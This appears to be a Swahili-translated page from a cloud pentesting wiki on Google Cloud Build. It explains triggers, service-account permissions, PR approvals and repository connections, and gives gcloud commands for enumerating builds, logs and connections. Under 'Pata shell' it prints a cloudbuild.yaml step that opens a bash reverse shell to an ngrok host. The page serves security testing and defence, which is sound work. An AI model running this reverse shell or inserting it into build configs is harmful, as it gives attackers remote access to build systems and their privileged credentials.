GCP - Cloud Build Enum

Reading time: 6 minutes

Basic Information

Google Cloud Build ni jukwaa la CI/CD lililosimamiwa ambalo linatumia mchakato wa kujenga na kutolewa kwa programu, likijumuisha na hifadhi za msimbo wa chanzo na kusaidia lugha mbalimbali za programu. In aruhusu waendelezaji kujenga, kujaribu, na kutekeleza msimbo kiotomatiki huku ikitoa uwezekano wa kubadilisha hatua za kujenga na michakato.

Kila Cloud Build Trigger imehusishwa na Hifadhi ya Cloud au imeunganishwa moja kwa moja na hifadhi ya nje (Github, Bitbucket na Gitlab).

Events

Cloud Build inaweza kuanzishwa ikiwa:

• Push to a branch: Tafadhali eleza tawi
• Push a new tag: Tafadhali eleza lebo
• Pull request: Tafadhali eleza tawi linalopokea PR
• Manual Invocation
• Pub/Sub message: Tafadhali eleza mada
• Webhook event: Itatoa URL ya HTTPS na ombi lazima liidhinishwe kwa siri

Execution

Kuna chaguzi 3:

• A yaml/json ikiainisha amri za kutekeleza. Kawaida: /cloudbuild.yaml
• Moja tu ambayo inaweza kuainishwa “inline” katika konsoli ya wavuti na katika cli
• Chaguo la kawaida zaidi
• Linalohusiana na ufikiaji usio na uthibitisho
• A Dockerfile ya kujenga
• A Buildpack ya kujenga

SA Permissions

Akaunti ya Huduma ina cloud-platform upeo, hivyo inaweza kutumia haki zote. Ikiwa hakuna SA iliyotajwa (kama wakati wa kuwasilisha) SA ya default <proj-number>@cloudbuild.gserviceaccount.com itatumika.

Kwa kawaida hakuna ruhusa zinazotolewa lakini ni rahisi sana kuzitoa:

Approvals

Inawezekana kuunda Cloud Build ili ihitaji idhini kwa ajili ya utekelezaji wa kujenga (imezimwa kwa kawaida).

PR Approvals

Wakati trigger ni PR kwa sababu mtu yeyote anaweza kufanya PR kwa hifadhi za umma itakuwa hatari sana tu kuruhusu utekelezaji wa trigger na PR yoyote. Kwa hivyo, kwa kawaida, utekelezaji utakuwa otomatiki kwa wamiliki na washiriki, na ili kutekeleza trigger na PR za watumiaji wengine mmiliki au mshiriki lazima aweke maoni /gcbrun.

Connections & Repositories

Mawasiliano yanaweza kuundwa juu ya:

• GitHub: Itatoa ombi la OAuth linaloomba ruhusa za kupata token ya Github ambayo itahifadhiwa ndani ya Meneja wa Siri.
• GitHub Enterprise: Itahitaji kusakinisha GithubApp. Token ya uthibitishaji kutoka kwa mwenyeji wako wa GitHub Enterprise itaundwa na kuhifadhiwa katika mradi huu kama siri ya Meneja wa Siri.
• GitLab / Enterprise: Unahitaji kutoa token ya ufikiaji wa API na token ya ufikiaji wa API ya Kusoma ambayo itahifadhiwa katika Meneja wa Siri.

Mara tu mawasiliano yanapoundwa, unaweza kuyatumia kuunganisha hifadhi ambazo akaunti ya Github ina ufikiaji.

Chaguo hili linapatikana kupitia kitufe:

Connect a Repository

Hii si sawa na connection. Hii inaruhusu njia tofauti za kupata ufikiaji wa hifadhi ya Github au Bitbucket lakini haiundui kituo cha muunganisho, lakini inaunda kituo cha hifadhi (cha kizazi cha 1).

Chaguo hili linapatikana kupitia kitufe:

Storage

Wakati mwingine Cloud Build itaunda hifadhi mpya kuhifadhi faili za trigger. Hii inatokea kwa mfano katika mfano ambao GCP inatoa na:

git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global

Kikasha cha Hifadhi kinachoitwa security-devbox_cloudbuild kimeundwa kuhifadhi .tgz yenye faili zitakazotumika.

Pata shell

steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY

Sakinisha gcloud ndani ya cloud build:

# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh

Enumeration

Unaweza kupata habari nyeti katika usanifu wa kujenga na kumbukumbu.

# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>

# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs

# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done

# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done

Kuinua Haki

GCP - Cloudbuild Privesc

Ufikiaji Usio Na Uthibitisho

GCP - Cloud Build Unauthenticated Enum

Baada ya Kutekeleza

GCP - Cloud Build Post Exploitation